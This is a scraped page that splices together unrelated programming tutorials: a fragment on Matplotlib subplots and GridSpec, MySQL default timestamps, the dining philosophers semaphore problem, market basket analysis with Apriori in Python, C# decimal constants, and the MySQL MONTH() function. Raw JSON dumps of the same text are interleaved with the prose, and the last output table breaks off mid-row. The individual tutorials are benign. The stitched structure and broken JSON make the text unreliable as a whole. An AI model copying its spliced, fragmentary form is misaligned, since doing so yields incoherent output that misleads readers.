link. I have explained how to use it in the following link." }, { "code": null, "e": 7238, "s": 7215, "text": "towardsdatascience.com" }, { "code": null, "e": 7393, "s": 7238, "text": "In this section, we will learn about customizing complicated axes using add_subplot and GridSpec. The complicated axes I mentioned are shown in Figure 10." }, { "code": null, "e": 7536, "s": 7393, "text": "We will create 3 axes (2 on the top, 1 on the bottom panel) as shown in Figure 1 using add_subplot syntax. You can use this code to create it." }, { "code": null, "e": 8033, "s": 7536, "text": "If you analyze the code, you will get a similar concept with the subplot syntax concept. There are three coordinates you need to define, e.g., (2, 2, 1) or (2, 2, (3, 4)). The axes sub1 is placed in the first axes (1) on the figure that consists of 2 rows and 2 columns. sub2 has similar schemes with sub1. The important one is sub3, which the combination between axes 3 and 4. So, the coordinate of sub3 is (2, 2, (3, 4)). If you run the code above, you will get a result, as shown in Figure 11." }, { "code": null, "e": 8131, "s": 8033, "text": "If you want to add a plot for each ax, you can add this code after defining sub1, sub2, and sub3." }, { "code": null, "e": 8177, "s": 8131, "text": "sub1.plot(x, y)sub2.plot(x, y)sub3.plot(x, y)" }, { "code": null, "e": 8200, "s": 8177, "text": "The full code is here." }, { "code": null, "e": 8246, "s": 8200, "text": "You will get a result, as shown in Figure 12." }, { "code": null, "e": 8361, "s": 8246, "text": "As an alternative, you can also create Figure 12 using gridspec syntax. Here is the code you can use to create it." }, { "code": null, "e": 8676, "s": 8361, "text": "The code creates 2 rows and 2 columns. sub1 and sub2 are placed on the first row, column 0 and column 1 (remember that gridspec is started from 0 indexes). sub3 is placed on the second row and takes all of the columns, represented by :. You will get the same plot, as shown in Figure 12, if you run the code above." }, { "code": null, "e": 8738, "s": 8676, "text": "The second example of complicated axes is shown in Figure 13." }, { "code": null, "e": 8989, "s": 8738, "text": "You will generate four axes in a figure: sub1, sub2, sub3, and sub4, in 2 rows and 4 columns. sub1 takes all the columns in the first row. sub2, sub3, and sub4 are placed on each column in the second row. To generate Figure 12, you can use this code." }, { "code": null, "e": 9048, "s": 8989, "text": "To create Figure 12 using gridspec, you can use this code." }, { "code": null, "e": 9162, "s": 9048, "text": "I think the code above is clear enough to be understood :D. The code will generate a plot, as shown in Figure 14." }, { "code": null, "e": 9203, "s": 9162, "text": "The third example is shown in Figure 15." }, { "code": null, "e": 9247, "s": 9203, "text": "To create Figure 15, you can use this code." }, { "code": null, "e": 9306, "s": 9247, "text": "To create Figure 15 using gridspec, you can use this code." }, { "code": null, "e": 9340, "s": 9306, "text": "The result is shown in Figure 16." }, { "code": null, "e": 9483, "s": 9340, "text": "In the last example, you will be guided to create 6 axes in a figure, with the number of rows is 4 and columns is 2. It is shown in Figure 17." }, { "code": null, "e": 9546, "s": 9483, "text": "To create it with add_subplot, you can use the following code." }, { "code": null, "e": 9604, "s": 9546, "text": "To create Figure 17 with gridspec, you can use this code." }, { "code": null, "e": 9825, "s": 9604, "text": "You need to pay attention to sub4, which is placed in rows 1:3 and column 1. Rows 1:3 means that sub4 will take rows number 1 and 2. Remember, rows 3 is not included. The code will generate a plot, as shown in Figure 17." }, { "code": null, "e": 10102, "s": 9825, "text": "Creating a complex plot to visualize your data is needed while you are working with complex data. I hope this story can help you to visualize your data from a different point of view. If you need to create scientific publication plots with Matplotlib, you can visit this link." }, { "code": null, "e": 10125, "s": 10102, "text": "towardsdatascience.com" }, { "code": null, "e": 10148, "s": 10125, "text": "towardsdatascience.com" }, { "code": null, "e": 10171, "s": 10148, "text": "towardsdatascience.com" }, { "code": null, "e": 10194, "s": 10171, "text": "towardsdatascience.com" }, { "code": null, "e": 10217, "s": 10194, "text": "towardsdatascience.com" } ]
Can MySQL automatically store timestamp in a row?
Yes, you can achieve this in the following two ways. First Approach At the time of creation of a table. First Approach At the time of creation of a table. Second Approach At the time of writing query. Second Approach At the time of writing query. The syntax is as follows. CREATE TABLE yourTableName ( yourDateTimeColumnName datetime default current_timestamp ); You can use alter command. The syntax is as follows. ALTER TABLE yourTableName ADD yourColumnName datetime DEFAULT CURRENT_TIMESTAMP; Implement both the syntaxes now. The first approach is as follows. mysql> create table CurrentTimeStampDemo -> ( -> CreationDate datetime default current_timestamp -> ); Query OK, 0 rows affected (0.61 sec) If you do not pass any parameter for the column ‘CreationDate’, MySQL by default stores the current timestamp. Insert record in the table using insert command. The query is as follows. mysql> insert into CurrentTimeStampDemo values(); Query OK, 1 row affected (0.12 sec) Let us now display all records from the table using select command. The query is as follows. mysql> select *from CurrentTimeStampDemo; The following is the output. +---------------------+ | CreationDate | +---------------------+ | 2019-01-02 15:53:03 | +---------------------+ 1 row in set (0.00 sec) This is using ALTER command. The query to create a table is as follows. mysql> create table Current_TimestampDemo -> ( -> Id int -> ); Query OK, 0 rows affected (0.43 sec) Here is the query to automatically store creation time. The query is as follows. mysql> ALTER TABLE Current_TimestampDemo -> ADD CreationDate datetime DEFAULT CURRENT_TIMESTAMP; Query OK, 0 rows affected (0.53 sec) Records: 0 Duplicates: 0 Warnings: 0 If you do not pass the value for column ‘CreationDate’. MySQL stores the current datetime value for this column. The query is as follows. mysql> insert into Current_TimestampDemo(Id) values(1); Query OK, 1 row affected (0.19 sec) Display records of the table using select statement. The query is as follows. mysql> select CreationDate from Current_TimestampDemo; The following is the output. +---------------------+ | CreationDate | +---------------------+ | 2019-01-02 16:25:12 | +---------------------+ 1 row in set (0.00 sec)
[ { "code": null, "e": 1115, "s": 1062, "text": "Yes, you can achieve this in the following two ways." }, { "code": null, "e": 1166, "s": 1115, "text": "First Approach At the time of creation of a table." }, { "code": null, "e": 1217, "s": 1166, "text": "First Approach At the time of creation of a table." }, { "code": null, "e": 1263, "s": 1217, "text": "Second Approach At the time of writing query." }, { "code": null, "e": 1309, "s": 1263, "text": "Second Approach At the time of writing query." }, { "code": null, "e": 1335, "s": 1309, "text": "The syntax is as follows." }, { "code": null, "e": 1425, "s": 1335, "text": "CREATE TABLE yourTableName\n(\nyourDateTimeColumnName datetime default current_timestamp\n);" }, { "code": null, "e": 1452, "s": 1425, "text": "You can use alter command." }, { "code": null, "e": 1478, "s": 1452, "text": "The syntax is as follows." }, { "code": null, "e": 1559, "s": 1478, "text": "ALTER TABLE yourTableName ADD yourColumnName datetime DEFAULT CURRENT_TIMESTAMP;" }, { "code": null, "e": 1592, "s": 1559, "text": "Implement both the syntaxes now." }, { "code": null, "e": 1626, "s": 1592, "text": "The first approach is as follows." }, { "code": null, "e": 1766, "s": 1626, "text": "mysql> create table CurrentTimeStampDemo\n-> (\n-> CreationDate datetime default current_timestamp\n-> );\nQuery OK, 0 rows affected (0.61 sec)" }, { "code": null, "e": 1877, "s": 1766, "text": "If you do not pass any parameter for the column ‘CreationDate’, MySQL by default stores the current timestamp." }, { "code": null, "e": 1951, "s": 1877, "text": "Insert record in the table using insert command. The query is as follows." }, { "code": null, "e": 2083, "s": 1951, "text": "mysql> insert into CurrentTimeStampDemo values();\nQuery OK, 1 row affected (0.12 sec)\nLet us now display all records from the table" }, { "code": null, "e": 2130, "s": 2083, "text": "using select command. The query is as follows." }, { "code": null, "e": 2172, "s": 2130, "text": "mysql> select *from CurrentTimeStampDemo;" }, { "code": null, "e": 2201, "s": 2172, "text": "The following is the output." }, { "code": null, "e": 2345, "s": 2201, "text": "+---------------------+\n| CreationDate |\n+---------------------+\n| 2019-01-02 15:53:03 |\n+---------------------+\n1 row in set (0.00 sec)" }, { "code": null, "e": 2417, "s": 2345, "text": "This is using ALTER command. The query to create a table is as follows." }, { "code": null, "e": 2517, "s": 2417, "text": "mysql> create table Current_TimestampDemo\n-> (\n-> Id int\n-> );\nQuery OK, 0 rows affected (0.43 sec)" }, { "code": null, "e": 2598, "s": 2517, "text": "Here is the query to automatically store creation time. The query is as follows." }, { "code": null, "e": 2769, "s": 2598, "text": "mysql> ALTER TABLE Current_TimestampDemo\n-> ADD CreationDate datetime DEFAULT CURRENT_TIMESTAMP;\nQuery OK, 0 rows affected (0.53 sec)\nRecords: 0 Duplicates: 0 Warnings: 0" }, { "code": null, "e": 2907, "s": 2769, "text": "If you do not pass the value for column ‘CreationDate’. MySQL stores the current datetime value for this column. The query is as follows." }, { "code": null, "e": 2999, "s": 2907, "text": "mysql> insert into Current_TimestampDemo(Id) values(1);\nQuery OK, 1 row affected (0.19 sec)" }, { "code": null, "e": 3077, "s": 2999, "text": "Display records of the table using select statement. The query is as follows." }, { "code": null, "e": 3132, "s": 3077, "text": "mysql> select CreationDate from Current_TimestampDemo;" }, { "code": null, "e": 3161, "s": 3132, "text": "The following is the output." }, { "code": null, "e": 3305, "s": 3161, "text": "+---------------------+\n| CreationDate |\n+---------------------+\n| 2019-01-02 16:25:12 |\n+---------------------+\n1 row in set (0.00 sec)" } ]
Dining Philosophers Problem (DPP)
The dining philosophers problem states that there are 5 philosophers sharing a circular table and they eat and think alternatively. There is a bowl of rice for each of the philosophers and 5 chopsticks. A philosopher needs both their right and left chopstick to eat. A hungry philosopher may only eat if there are both chopsticks available.Otherwise a philosopher puts down their chopstick and begin thinking again. The dining philosopher is a classic synchronization problem as it demonstrates a large class of concurrency control problems. A solution of the Dining Philosophers Problem is to use a semaphore to represent a chopstick. A chopstick can be picked up by executing a wait operation on the semaphore and released by executing a signal semaphore. The structure of the chopstick is shown below − semaphore chopstick [5]; Initially the elements of the chopstick are initialized to 1 as the chopsticks are on the table and not picked up by a philosopher. The structure of a random philosopher i is given as follows − do { wait( chopstick[i] ); wait( chopstick[ (i+1) % 5] ); . . . EATING THE RICE . signal( chopstick[i] ); signal( chopstick[ (i+1) % 5] ); . . THINKING . } while(1); In the above structure, first wait operation is performed on chopstick[i] and chopstick[ (i+1) % 5]. This means that the philosopher i has picked up the chopsticks on his sides. Then the eating function is performed. After that, signal operation is performed on chopstick[i] and chopstick[ (i+1) % 5]. This means that the philosopher i has eaten and put down the chopsticks on his sides. Then the philosopher goes back to thinking. The above solution makes sure that no two neighboring philosophers can eat at the same time. But this solution can lead to a deadlock. This may happen if all the philosophers pick their left chopstick simultaneously. Then none of them can eat and deadlock occurs. Some of the ways to avoid deadlock are as follows − There should be at most four philosophers on the table. An even philosopher should pick the right chopstick and then the left chopstick while an odd philosopher should pick the left chopstick and then the right chopstick. A philosopher should only be allowed to pick their chopstick if both are available at the same time.
[ { "code": null, "e": 1478, "s": 1062, "text": "The dining philosophers problem states that there are 5 philosophers sharing a circular table and they eat and think alternatively. There is a bowl of rice for each of the philosophers and 5 chopsticks. A philosopher needs both their right and left chopstick to eat. A hungry philosopher may only eat if there are both chopsticks available.Otherwise a philosopher puts down their chopstick and begin thinking again." }, { "code": null, "e": 1604, "s": 1478, "text": "The dining philosopher is a classic synchronization problem as it demonstrates a large class of concurrency control problems." }, { "code": null, "e": 1820, "s": 1604, "text": "A solution of the Dining Philosophers Problem is to use a semaphore to represent a chopstick. A chopstick can be picked up by executing a wait operation on the semaphore and released by executing a signal semaphore." }, { "code": null, "e": 1868, "s": 1820, "text": "The structure of the chopstick is shown below −" }, { "code": null, "e": 1893, "s": 1868, "text": "semaphore chopstick [5];" }, { "code": null, "e": 2025, "s": 1893, "text": "Initially the elements of the chopstick are initialized to 1 as the chopsticks are on the table and not picked up by a philosopher." }, { "code": null, "e": 2087, "s": 2025, "text": "The structure of a random philosopher i is given as follows −" }, { "code": null, "e": 2283, "s": 2087, "text": "do {\n wait( chopstick[i] );\n wait( chopstick[ (i+1) % 5] );\n . .\n . EATING THE RICE\n .\n signal( chopstick[i] );\n signal( chopstick[ (i+1) % 5] );\n .\n . THINKING\n .\n} while(1);" }, { "code": null, "e": 2500, "s": 2283, "text": "In the above structure, first wait operation is performed on chopstick[i] and chopstick[ (i+1) % 5]. This means that the philosopher i has picked up the chopsticks on his sides. Then the eating function is performed." }, { "code": null, "e": 2715, "s": 2500, "text": "After that, signal operation is performed on chopstick[i] and chopstick[ (i+1) % 5]. This means that the philosopher i has eaten and put down the chopsticks on his sides. Then the philosopher goes back to thinking." }, { "code": null, "e": 2979, "s": 2715, "text": "The above solution makes sure that no two neighboring philosophers can eat at the same time. But this solution can lead to a deadlock. This may happen if all the philosophers pick their left chopstick simultaneously. Then none of them can eat and deadlock occurs." }, { "code": null, "e": 3031, "s": 2979, "text": "Some of the ways to avoid deadlock are as follows −" }, { "code": null, "e": 3087, "s": 3031, "text": "There should be at most four philosophers on the table." }, { "code": null, "e": 3253, "s": 3087, "text": "An even philosopher should pick the right chopstick and then the left chopstick while an odd philosopher should pick the left chopstick and then the right chopstick." }, { "code": null, "e": 3354, "s": 3253, "text": "A philosopher should only be allowed to pick their chopstick if both are available at the same time." } ]
MBA For Breakfast — A Simple Guide to Market Basket Analysis | by George Wong | Towards Data Science
So recently, I was fortunate enough to work on a project that involves doing market basket analysis but obviously I wouldn’t be able to discuss my work at Kaodim on Medium. So instead, I try to look for suitable datasets on Kaggle.com. Which I managed to find one here AND applied whatever that I know to make it happen! Also Shout-out to Susan Li for her wonderful work on MBA, which can be found here! So what is a Market Basket Analysis? According to the book Database Marketing: Market basket analysis scrutinizes the products customers tend to buy together, and uses the information to decide which products should be cross-sold or promoted together. The term arises from the shopping carts supermarket shoppers fill up during a shopping trip. On a side note, Market Basket is also a chain of 79 supermarkets in New Hampshire, Massachusetts, and Maine in the United States, with headquarters in Tewksbury, Massachusetts (Wikipedia). Normally MBA is done on transaction data from the point of sales system on a customer level. We can use MBA to extract interesting association between products from the data. Hence its output consists of a series of product association rules: for example, if customers buy product A they also tend to buy product B. We will follow the three most popular criteria evaluating the quality or the strength of an association rule (will get back to this later). Getting the right packages (Python): import pandas as pdimport numpy as np import seaborn as snsimport matplotlib.pyplot as pltfrom mlxtend.frequent_patterns import apriorifrom mlxtend.frequent_patterns import association_rulesimport mlxtend as ml bread = pd.read_csv(r"D:\Downloads\BreadBasket_DMS.csv")bread.head(8) “Data set containing 15'010 observations and more than 6.000 transactions from a bakery.” More information on the variables can be found in Kaggle. What are the “hot” items at BreadBasket? sns.countplot(x = 'Item', data = bread, order = bread['Item'].value_counts().iloc[:10].index)plt.xticks(rotation=90) It seems like coffee are the hottest item in the dataset, I guess everybody wants a cup of hot coffee in the morning perhaps. Time to get right into the MBA itself! Kudos to Chris Moffitt on the awesome guide and tutorial of MBA using python. We will be using MLxtend library’s Apriori Algorithm for extracting frequent item sets for further analysis. The apriorifunction expects data in a one-hot encoded pandas DataFrame. Thus your dataframe should look like this: First, We’ll group the bread dataframe accordingly and display the count of items then we need to consolidate the items into 1 transaction per row with each product 1 hot encoded. Which would result in the table above! df = bread.groupby(['Transaction','Item']).size().reset_index(name='count')basket = (df.groupby(['Transaction', 'Item'])['count'] .sum().unstack().reset_index().fillna(0) .set_index('Transaction'))#The encoding functiondef encode_units(x): if x <= 0: return 0 if x >= 1: return 1basket_sets = basket.applymap(encode_units) After that, we will generate frequent item sets with a minimum support of at least 1% as this a more favourable support level that could show us more results. frequent_itemsets = apriori(basket_sets, min_support=0.01, use_colnames=True)rules = association_rules(frequent_itemsets, metric="lift")rules.sort_values('confidence', ascending = False, inplace = True)rules.head(10) Remember I told y’all that we’ll get back to the three most popular criteria evaluating the quality or the strength of an association rule. There are support, confidence and lift: 1. Support is the percentage of transactions containing a particular combination of items relative to the total number of transactions in the database. The support for the combination A and B would be, P(AB) or P(A) for Individual A 2. Confidence measures how much the consequent (item) is dependent on theantecedent (item). In other words, confidence is the conditional probability of the consequent given the antecedent, P(B|A) where P(B|A) = P(AB)/P(A) 3. Lift (also called improvement or impact) is a measure to overcome theproblems with support and confidence. Lift is said to measure the difference — measured in ratio — between the confidence of a rule and the expected confidence. Consider an association rule “if A then B.” The lift for the rule is defined as P(B|A)/P(B) or P(AB)/[P(A)P(B)]. As shown in the formula, lift is symmetric in that the lift for “if A then B” is the same as the lift for “if B then A.”4. Each criterion has its advantages and disadvantages but in general we would like association rules that have high confidence, high support, and high lift. As a summary, Confidence = P(B|A) Support = P(AB) Lift = P(B|A)/P(B) From the output, the lift of an association rule “if Toast then Coffee” is 1.48 because the confidence is 70%. This means that consumers who purchase Toast are 1.48 times more likely to purchase Coffee than randomly chosen customers. Larger lift means more interesting rules. Association rules with high support are potentially interesting rules. Similarly, rules with high confidence would be interesting rules as well. Reference: Kaggle Dataset: https://www.kaggle.com/xvivancos/transactions-from-a-bakery Susan Li’s Market Basket Analysis: https://towardsdatascience.com/a-gentle-introduction-on-market-basket-analysis-association-rules-fa4b986a40ce Database Marketing book: https://www.springer.com/gp/book/9780387725789 Apriori Algorithm: http://rasbt.github.io/mlxtend/user_guide/frequent_patterns/apriori/ Market Basket Analysis using Python by Chris Moffitt: http://pbpython.com/market-basket-analysis.html Kaodim.com: https://www.kaodim.com/ Source code in Jupyter Notebook here!
[ { "code": null, "e": 576, "s": 172, "text": "So recently, I was fortunate enough to work on a project that involves doing market basket analysis but obviously I wouldn’t be able to discuss my work at Kaodim on Medium. So instead, I try to look for suitable datasets on Kaggle.com. Which I managed to find one here AND applied whatever that I know to make it happen! Also Shout-out to Susan Li for her wonderful work on MBA, which can be found here!" }, { "code": null, "e": 655, "s": 576, "text": "So what is a Market Basket Analysis? According to the book Database Marketing:" }, { "code": null, "e": 921, "s": 655, "text": "Market basket analysis scrutinizes the products customers tend to buy together, and uses the information to decide which products should be cross-sold or promoted together. The term arises from the shopping carts supermarket shoppers fill up during a shopping trip." }, { "code": null, "e": 1110, "s": 921, "text": "On a side note, Market Basket is also a chain of 79 supermarkets in New Hampshire, Massachusetts, and Maine in the United States, with headquarters in Tewksbury, Massachusetts (Wikipedia)." }, { "code": null, "e": 1566, "s": 1110, "text": "Normally MBA is done on transaction data from the point of sales system on a customer level. We can use MBA to extract interesting association between products from the data. Hence its output consists of a series of product association rules: for example, if customers buy product A they also tend to buy product B. We will follow the three most popular criteria evaluating the quality or the strength of an association rule (will get back to this later)." }, { "code": null, "e": 1603, "s": 1566, "text": "Getting the right packages (Python):" }, { "code": null, "e": 1814, "s": 1603, "text": "import pandas as pdimport numpy as np import seaborn as snsimport matplotlib.pyplot as pltfrom mlxtend.frequent_patterns import apriorifrom mlxtend.frequent_patterns import association_rulesimport mlxtend as ml" }, { "code": null, "e": 1884, "s": 1814, "text": "bread = pd.read_csv(r\"D:\\Downloads\\BreadBasket_DMS.csv\")bread.head(8)" }, { "code": null, "e": 2032, "s": 1884, "text": "“Data set containing 15'010 observations and more than 6.000 transactions from a bakery.” More information on the variables can be found in Kaggle." }, { "code": null, "e": 2073, "s": 2032, "text": "What are the “hot” items at BreadBasket?" }, { "code": null, "e": 2190, "s": 2073, "text": "sns.countplot(x = 'Item', data = bread, order = bread['Item'].value_counts().iloc[:10].index)plt.xticks(rotation=90)" }, { "code": null, "e": 2316, "s": 2190, "text": "It seems like coffee are the hottest item in the dataset, I guess everybody wants a cup of hot coffee in the morning perhaps." }, { "code": null, "e": 2433, "s": 2316, "text": "Time to get right into the MBA itself! Kudos to Chris Moffitt on the awesome guide and tutorial of MBA using python." }, { "code": null, "e": 2657, "s": 2433, "text": "We will be using MLxtend library’s Apriori Algorithm for extracting frequent item sets for further analysis. The apriorifunction expects data in a one-hot encoded pandas DataFrame. Thus your dataframe should look like this:" }, { "code": null, "e": 2876, "s": 2657, "text": "First, We’ll group the bread dataframe accordingly and display the count of items then we need to consolidate the items into 1 transaction per row with each product 1 hot encoded. Which would result in the table above!" }, { "code": null, "e": 3237, "s": 2876, "text": "df = bread.groupby(['Transaction','Item']).size().reset_index(name='count')basket = (df.groupby(['Transaction', 'Item'])['count'] .sum().unstack().reset_index().fillna(0) .set_index('Transaction'))#The encoding functiondef encode_units(x): if x <= 0: return 0 if x >= 1: return 1basket_sets = basket.applymap(encode_units)" }, { "code": null, "e": 3396, "s": 3237, "text": "After that, we will generate frequent item sets with a minimum support of at least 1% as this a more favourable support level that could show us more results." }, { "code": null, "e": 3613, "s": 3396, "text": "frequent_itemsets = apriori(basket_sets, min_support=0.01, use_colnames=True)rules = association_rules(frequent_itemsets, metric=\"lift\")rules.sort_values('confidence', ascending = False, inplace = True)rules.head(10)" }, { "code": null, "e": 3995, "s": 3613, "text": "Remember I told y’all that we’ll get back to the three most popular criteria evaluating the quality or the strength of an association rule. There are support, confidence and lift: 1. Support is the percentage of transactions containing a particular combination of items relative to the total number of transactions in the database. The support for the combination A and B would be," }, { "code": null, "e": 4026, "s": 3995, "text": "P(AB) or P(A) for Individual A" }, { "code": null, "e": 4216, "s": 4026, "text": "2. Confidence measures how much the consequent (item) is dependent on theantecedent (item). In other words, confidence is the conditional probability of the consequent given the antecedent," }, { "code": null, "e": 4223, "s": 4216, "text": "P(B|A)" }, { "code": null, "e": 4249, "s": 4223, "text": "where P(B|A) = P(AB)/P(A)" }, { "code": null, "e": 4562, "s": 4249, "text": "3. Lift (also called improvement or impact) is a measure to overcome theproblems with support and confidence. Lift is said to measure the difference — measured in ratio — between the confidence of a rule and the expected confidence. Consider an association rule “if A then B.” The lift for the rule is defined as" }, { "code": null, "e": 4595, "s": 4562, "text": "P(B|A)/P(B) or P(AB)/[P(A)P(B)]." }, { "code": null, "e": 4873, "s": 4595, "text": "As shown in the formula, lift is symmetric in that the lift for “if A then B” is the same as the lift for “if B then A.”4. Each criterion has its advantages and disadvantages but in general we would like association rules that have high confidence, high support, and high lift." }, { "code": null, "e": 4887, "s": 4873, "text": "As a summary," }, { "code": null, "e": 4907, "s": 4887, "text": "Confidence = P(B|A)" }, { "code": null, "e": 4923, "s": 4907, "text": "Support = P(AB)" }, { "code": null, "e": 4942, "s": 4923, "text": "Lift = P(B|A)/P(B)" }, { "code": null, "e": 5363, "s": 4942, "text": "From the output, the lift of an association rule “if Toast then Coffee” is 1.48 because the confidence is 70%. This means that consumers who purchase Toast are 1.48 times more likely to purchase Coffee than randomly chosen customers. Larger lift means more interesting rules. Association rules with high support are potentially interesting rules. Similarly, rules with high confidence would be interesting rules as well." }, { "code": null, "e": 5374, "s": 5363, "text": "Reference:" }, { "code": null, "e": 5450, "s": 5374, "text": "Kaggle Dataset: https://www.kaggle.com/xvivancos/transactions-from-a-bakery" }, { "code": null, "e": 5595, "s": 5450, "text": "Susan Li’s Market Basket Analysis: https://towardsdatascience.com/a-gentle-introduction-on-market-basket-analysis-association-rules-fa4b986a40ce" }, { "code": null, "e": 5667, "s": 5595, "text": "Database Marketing book: https://www.springer.com/gp/book/9780387725789" }, { "code": null, "e": 5755, "s": 5667, "text": "Apriori Algorithm: http://rasbt.github.io/mlxtend/user_guide/frequent_patterns/apriori/" }, { "code": null, "e": 5857, "s": 5755, "text": "Market Basket Analysis using Python by Chris Moffitt: http://pbpython.com/market-basket-analysis.html" }, { "code": null, "e": 5893, "s": 5857, "text": "Kaodim.com: https://www.kaodim.com/" } ]
Decimal constants in C#
Decimal type has constants to get the minimum and maximum values. Set a decimal value − decimal d = 5.8M; To get the minimum and maximum values of the decimal type, use the following properties − decimal.MaxValue decimal.MinValue Here is the complete code − Live Demo using System; using System.Linq; class Demo { static void Main() { decimal d = 5.8M; Console.WriteLine(d); Console.WriteLine("Maximum Value: "+decimal.MaxValue); Console.WriteLine("Maximum Value: "+decimal.MinValue); } } 5.8 Maximum Value: 79228162514264337593543950335 Maximum Value: -79228162514264337593543950335
[ { "code": null, "e": 1128, "s": 1062, "text": "Decimal type has constants to get the minimum and maximum values." }, { "code": null, "e": 1150, "s": 1128, "text": "Set a decimal value −" }, { "code": null, "e": 1168, "s": 1150, "text": "decimal d = 5.8M;" }, { "code": null, "e": 1258, "s": 1168, "text": "To get the minimum and maximum values of the decimal type, use the following properties −" }, { "code": null, "e": 1292, "s": 1258, "text": "decimal.MaxValue\ndecimal.MinValue" }, { "code": null, "e": 1320, "s": 1292, "text": "Here is the complete code −" }, { "code": null, "e": 1331, "s": 1320, "text": " Live Demo" }, { "code": null, "e": 1582, "s": 1331, "text": "using System;\nusing System.Linq;\nclass Demo {\n static void Main() {\n decimal d = 5.8M;\n Console.WriteLine(d);\n Console.WriteLine(\"Maximum Value: \"+decimal.MaxValue);\n Console.WriteLine(\"Maximum Value: \"+decimal.MinValue);\n }\n}" }, { "code": null, "e": 1677, "s": 1582, "text": "5.8\nMaximum Value: 79228162514264337593543950335\nMaximum Value: -79228162514264337593543950335" } ]
MySQL - MONTH() Function
The DATE, DATETIME and TIMESTAMP datatypes in MySQL are used to store the date, date and time, time stamp values respectively. Where a time stamp is a numerical value representing the number of milliseconds from '1970-01-01 00:00:01' UTC (epoch) to the specified time. MySQL provides a set of functions to manipulate these values. The MYSQL MONTH() function is used to retrieve and return the MONTH of the given date or, date time expression. This function returns a numerical value ranging from 1 to 12 representing the month (January to December). Following is the syntax of the above function – MONTH(date); Where, date is the date value from which you need to retrieve the month. Following example demonstrates the usage of the MONTH() function – mysql> SELECT MONTH('2019-05-25'); +---------------------+ | MONTH('2019-05-25') | +---------------------+ | 5 | +---------------------+ 1 row in set (0.18 sec) Following is another example of this function – mysql> SELECT MONTH('2008-09-17'); +---------------------+ | MONTH('2008-09-17') | +---------------------+ | 9 | +---------------------+ 1 row in set (0.00 sec) If the month value in the given date is 0 this function returns 0 — mysql> SELECT MONTH('2017-00-00'); +---------------------+ | MONTH('2017-00-00') | +---------------------+ | 0| +---------------------+ 1 row in set (0.00 sec) mysql> SELECT MONTH('1789-00-07'); +---------------------+ | MONTH('1789-00-07') | +---------------------+ | 0 | +---------------------+ 1 row in set (0.00 sec) If you pass an empty string or a non-string value as an argument this function returns NULL. mysql> SELECT MONTH(''); +-----------+ | MONTH('') | +-----------+ | NULL | +-----------+ 1 row in set, 1 warning (0.00 sec) mysql> SELECT MONTH(1990-11-11); +-------------------+ | MONTH(1990-11-11) | +-------------------+ | NULL | +-------------------+ 1 row in set, 1 warning (0.00 sec) We can also pass the date-time expression as an argument to this function – mysql> SELECT MONTH('2015-09-05 09:40:45.2300'); +-----------------------------------+ | MONTH('2015-09-05 09:40:45.2300') | +-----------------------------------+ | 9 | +-----------------------------------+ 1 row in set (0.00 sec) In the following example we are retrieving the month (number) from the current date — mysql> SELECT MONTH(CURDATE()); +------------------+ | MONTH(CURDATE()) | +------------------+ | 7 | +------------------+ 1 row in set (0.00 sec) In the following example we are retrieving the month (number) from the current timestamp — mysql> SELECT MONTH(CURRENT_TIMESTAMP()); +----------------------------+ | MONTH(CURRENT_TIMESTAMP()) | +----------------------------+ | 7 | +----------------------------+ 1 row in set (0.00 sec) You can also pass the column name as an argument to this function. Let us create a table with name MyPlayers in MySQL database using CREATE statement as shown below – mysql> CREATE TABLE MyPlayers( ID INT, First_Name VARCHAR(255), Last_Name VARCHAR(255), Date_Of_Birth date, Place_Of_Birth VARCHAR(255), Country VARCHAR(255), PRIMARY KEY (ID) ); Now, we will insert 7 records in MyPlayers table using INSERT statements: mysql> insert into MyPlayers values(1, 'Shikhar', 'Dhawan', DATE('1981-12-05'), 'Delhi', 'India'); mysql> insert into MyPlayers values(2, 'Jonathan', 'Trott', DATE('1981-04-22'), 'CapeTown', 'SouthAfrica'); mysql> insert into MyPlayers values(3, 'Kumara', 'Sangakkara', DATE('1977-10-27'), 'Matale', 'Srilanka'); mysql> insert into MyPlayers values(4, 'Virat', 'Kohli', DATE('1988-11-05'), 'Delhi', 'India'); mysql> insert into MyPlayers values(5, 'Rohit', 'Sharma', DATE('1987-04-30'), 'Nagpur', 'India'); mysql> insert into MyPlayers values(6, 'Ravindra', 'Jadeja', DATE('1988-12-06'), 'Nagpur', 'India'); mysql> insert into MyPlayers values(7, 'James', 'Anderson', DATE('1982-06-30'), 'Burnley', 'England'); Following query retrieves and prints the month (number) from all the entities of the Date_Of_Birth column of the table MyPlayers — mysql> SELECT First_Name, Last_Name, Date_Of_Birth, Country, MONTH(Date_Of_Birth) FROM MyPlayers; +------------+------------+---------------+-------------+----------------------+ | First_Name | Last_Name | Date_Of_Birth | Country | MONTH(Date_Of_Birth) | +------------+------------+---------------+-------------+----------------------+ | Shikhar | Dhawan | 1981-12-05 | India | 12 | | Jonathan | Trott | 1981-04-22 | SouthAfrica | 4 | | Kumara | Sangakkara | 1977-10-27 | Srilanka | 10 | | Virat | Kohli | 1988-11-05 | India | 11 | | Rohit | Sharma | 1987-04-30 | India | 4 | | Ravindra | Jadeja | 1988-12-06 | India | 12 | | James | Anderson | 1982-06-30 | England | 6 | +------------+------------+---------------+-------------+----------------------+ 7 rows in set (0.00 sec) Suppose we have created a table named dispatches_data with 5 records in it using the following queries – mysql> CREATE TABLE dispatches_data( ProductName VARCHAR(255), CustomerName VARCHAR(255), DispatchTimeStamp timestamp, Price INT, Location VARCHAR(255) ); insert into dispatches_data values('Key-Board', 'Raja', TIMESTAMP('2019-05-04', '15:02:45'), 7000, 'Hyderabad'); insert into dispatches_data values('Earphones', 'Roja', TIMESTAMP('2019-06-26', '14:13:12'), 2000, 'Vishakhapatnam'); insert into dispatches_data values('Mouse', 'Puja', TIMESTAMP('2019-12-07', '07:50:37'), 3000, 'Vijayawada'); insert into dispatches_data values('Mobile', 'Vanaja' , TIMESTAMP ('2018-03-21', '16:00:45'), 9000, 'Chennai'); insert into dispatches_data values('Headset', 'Jalaja' , TIMESTAMP('2018-12-30', '10:49:27'), 6000, 'Goa'); Following query retrieves the month values (numbers) from the DispatchTimeStamp column — mysql> SELECT ProductName, CustomerName, DispatchTimeStamp, Price, MONTH(DispatchTimeStamp) FROM dispatches_data; +-------------+--------------+---------------------+-------+--------------------------+ | ProductName | CustomerName | DispatchTimeStamp | Price | MONTH(DispatchTimeStamp) | +-------------+--------------+---------------------+-------+--------------------------+ | Key-Board | Raja | 2019-05-04 15:02:45 | 7000 | 5 | | Earphones | Roja | 2019-06-26 14:13:12 | 2000 | 6 | | Mouse | Puja | 2019-12-07 07:50:37 | 3000 | 12 | | Mobile | Vanaja | 2018-03-21 16:00:45 | 9000 | 3 | | Headset | Jalaja | 